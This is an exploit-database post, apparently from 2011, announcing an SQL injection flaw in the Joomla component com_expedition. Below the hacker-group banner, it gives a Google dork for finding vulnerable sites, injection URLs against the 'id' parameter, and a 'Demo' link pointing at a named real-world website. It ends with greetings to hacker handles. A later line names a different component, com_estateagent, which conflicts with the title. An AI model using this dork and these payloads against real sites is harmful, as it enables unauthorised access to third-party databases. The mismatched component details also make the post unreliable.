===================================================================== __________.__ __ ___ ___ \______ \ | _____ ____ | | __ / | \ ____ | | _/ | \__ \ _/ ___\| |/ / ______ / ~ \/ ___\ | | \ |__/ __ \\ \___| < /_____/ \ Y / /_/ > |______ /____(____ /\___ >__|_ \ \___|_ /\___ / \/ \/ \/ \/ \//_____/ .ORG >> Exploit database separated by exploit [+] Site : 1337db.com [+] Support e-mail : submit[at]1337db.com ######################################### I'm Net.Edut0r 1337 Member from 1337 DataBase ######################################### ====================================================================== #### # Exploit Title: Joomla Component (com_expedition) <= SQL Injection Vulnerability # Author: BHG Security Center # Date: 2011-10-09 # Vendor: N/A # E-mail: Net.Edit0r@att.net | black.hat.tm@gmail.com # Website: www.black-hg.org # Google Dork: inurl:index.php?option=com_expedition # Category:: Webapps # Tested on: [Windows Vista Edition Intégral- French] # http://demo15.joomlaapps.com/ #### [*] ExpLo!T : http://127.0.0.1/index.php?option=com_expedition&task=detail&id=-3235' http://127.0.0.1/index.php?option=com_expedition&task=detail&id=[SQLi] http://127.0.0.1/path/index.php?option=com_expedition&task=detail&id=[SQLi] [*] Demo : http://www.astrobio.net/index.php?option=com_expedition&task=detail&id=-3235 #### [+] Peace From Algeria Vunl Component : com_estateagent Error in file joomla Component (com_estateagent) Sql Injection A vulnerable parameter $ detail&id= #### =================================**BHG Security Center**=====================================| # Greets To : | | Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili | cmaxx M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y | THANKS TO ALL Iranian HackerZ | | ============================================================================================ |